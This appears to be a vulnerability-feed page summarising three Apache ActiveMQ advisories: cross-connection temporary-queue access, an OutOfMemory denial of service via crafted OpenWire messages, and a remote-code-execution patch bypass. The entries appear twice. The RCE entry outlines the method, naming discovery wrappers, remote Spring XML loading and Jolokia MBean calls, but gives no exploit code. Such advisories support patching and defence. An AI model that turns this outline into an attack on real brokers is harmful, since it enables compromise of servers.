Activemq Broker
Monthly
Unauthorized message consumption in Apache ActiveMQ Classic lets a connected client read from temporary destinations belonging to a different connection, breaking the per-connection isolation that applications rely on. The root cause is that the isolation check is enforced only client-side, so a malicious or rogue client can subscribe to and drain another connection's temporary queue/topic. It affects ActiveMQ (Broker/All/Classic) before 5.19.8 and 6.0.0 before 6.2.7; there is no public exploit identified at time of analysis, and it is not in CISA KEV.
Denial of service in Apache ActiveMQ (versions before 5.19.8, and 6.0.0 before 6.2.7) lets an authenticated user crash the broker by sending a crafted OpenWire message whose property map declares an excessively large encoded size. Because the map is unmarshaled without validating the declared size against actual payload bounds, the broker pre-allocates massive memory and hits an OutOfMemory condition. No public exploit identified at time of analysis and the issue is not in CISA KEV, but the low attack complexity and availability of a vendor patch make it a practical operational concern for exposed brokers.
Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2.6) allows authenticated attackers to bypass the CVE-2026-34197 fix using non-parenthesized discovery wrappers such as `masterslave:vm://...` and `static:vm://...`, which incorrectly pass validation and trigger the VM transport's brokerConfig parameter to load a remote Spring XML application context. The flaw abuses the Jolokia JMX-HTTP bridge at /api/jolokia/ to invoke BrokerService.addNetworkConnector/addConnector MBean operations, resulting in arbitrary code execution on the broker JVM. EPSS is low at 0.06% (19th percentile) and no public exploit identified at time of analysis, but the patch bypass nature and prior in-the-wild interest in ActiveMQ RCE chains warrant urgent patching.
Unauthorized message consumption in Apache ActiveMQ Classic lets a connected client read from temporary destinations belonging to a different connection, breaking the per-connection isolation that applications rely on. The root cause is that the isolation check is enforced only client-side, so a malicious or rogue client can subscribe to and drain another connection's temporary queue/topic. It affects ActiveMQ (Broker/All/Classic) before 5.19.8 and 6.0.0 before 6.2.7; there is no public exploit identified at time of analysis, and it is not in CISA KEV.
Denial of service in Apache ActiveMQ (versions before 5.19.8, and 6.0.0 before 6.2.7) lets an authenticated user crash the broker by sending a crafted OpenWire message whose property map declares an excessively large encoded size. Because the map is unmarshaled without validating the declared size against actual payload bounds, the broker pre-allocates massive memory and hits an OutOfMemory condition. No public exploit identified at time of analysis and the issue is not in CISA KEV, but the low attack complexity and availability of a vendor patch make it a practical operational concern for exposed brokers.
Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2.6) allows authenticated attackers to bypass the CVE-2026-34197 fix using non-parenthesized discovery wrappers such as `masterslave:vm://...` and `static:vm://...`, which incorrectly pass validation and trigger the VM transport's brokerConfig parameter to load a remote Spring XML application context. The flaw abuses the Jolokia JMX-HTTP bridge at /api/jolokia/ to invoke BrokerService.addNetworkConnector/addConnector MBean operations, resulting in arbitrary code execution on the broker JVM. EPSS is low at 0.06% (19th percentile) and no public exploit identified at time of analysis, but the patch bypass nature and prior in-the-wild interest in ActiveMQ RCE chains warrant urgent patching.